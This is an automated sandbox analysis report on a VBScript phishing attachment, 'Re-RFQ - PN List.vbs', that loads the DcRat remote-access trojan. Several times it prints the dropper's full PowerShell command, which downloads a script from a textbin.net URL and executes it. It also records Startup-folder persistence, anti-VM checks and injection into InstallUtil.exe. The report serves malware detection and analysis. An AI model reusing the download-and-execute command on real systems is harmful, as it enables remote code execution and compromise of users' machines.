Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B94E0	14_2_016B94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9DB0	14_2_016B9DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BDE60	14_2_016BDE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B71D8	14_2_016B71D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9198	14_2_016B9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BFB08	14_2_016BFB08

Java / VBScript file with very long strings (likely obfuscated code)

Source: Re-RFQ - PN List.vbs

Initial sample: Strings found which are bigger than 50

Tries to load missing DLLs

Source: C:\Windows\System32\wscript.exe

Section loaded: security.dll

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"	Jump to behavior

Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B788A push eax; ret	6_2_00007FFEBC8B788B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B0D97 pushad ; ret	6_2_00007FFEBC8B0D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B7717 push ebx; retf	6_2_00007FFEBC8B771A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC983CFF push edi; iretd	6_2_00007FFEBC983D06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC980C92 push ecx; iretd	6_2_00007FFEBC980C93

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: Yara match	File source: 00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\gia9ab2dg0.PS1, type: DROPPED

Source: C:\Windows\System32\wscript.exe TID: 7136	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4984	Thread sleep count: 6172 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep count: 3199 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6652	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 6515 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 3038 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3374	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6172	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3199	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3038	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: InstallUtil.exe, 0000000E.00000002.911146064.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hGFsj
Source: wscript.exe, 00000000.00000003.391544975.000001C9E3EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401953854.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407672087.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392257266.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392112337.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392759428.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398093157.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.397854670.000001C9E3EB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.390175419.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407629768.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000002.00000003.519628878.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.536219164.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
